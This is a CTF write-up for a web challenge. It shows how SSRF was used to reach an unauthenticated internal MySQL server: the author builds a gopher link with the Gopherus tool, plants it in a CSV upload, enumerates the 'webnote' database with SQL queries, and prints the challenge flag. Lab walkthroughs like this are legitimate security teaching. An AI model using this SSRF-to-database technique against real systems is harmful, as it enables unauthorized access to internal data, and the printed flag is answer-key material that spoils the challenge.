![43e8a55cc6906b58027ff646aef7d714.png](0ebf6e35dc0d426a8c77cfb6e54397ab.png)
While logged in as admin, we see a **messages** button, clicking that reveals
![7570a88f3bf06f4f201d61c1ec8ca6b2.png](e34acd03d04343918d1299528f90f1dc.png)
So `brian` has a **mysql** database that isn't password protected. Neat.
The server configuration confirms the existance of a **mysql** server
![3afe5fdb3181f7c575e4647dd7c0eca3.png](cebf0c3f22874be7afc5283c2796403b.png)
Thinks we know:
1. brian has a mysql server that doesn't require a password
2. the mysql server is at `10.10.10.53:3306`
3. The server is vulnerable to **SSRF**
There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gohper** link for us to use
https://github.com/tarunkant/Gopherus
`gopherus --exploit mysql`
![091fd0f0915d6adf7185a3854a73c72a.png](81b65e0a210e44529e2779fe63818ed9.png)
adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (10.10.10.53), we get back
```
Log:
Resp: shipmentID,arrival_date,catalogURL
Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA
invalid format!
Cannot import records!
```
More base64
![172daae54d361ddd734d2bee4d2a207e.png](8218a9cd4c09411880759fd12b7de1c6.png)
Looks like there's a database called `webnote`. Using **gopherus** to issue these commands, we can enumerate the database
1. `show databases;`
- reveals the database `webnote`
2. `use webnote; show tables;`
- reveals the table `settings`
3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';`
- reveals the columns `apikey` and `note`
4. `use webnote; select note from settings;`
- gives the flag
![5e3131c1295e9cd09e49d84edb86b54b.png](10b86198686349759874cc4dc5753cf9.png)
`flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}`
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #ssrf #mysql #sql
Related: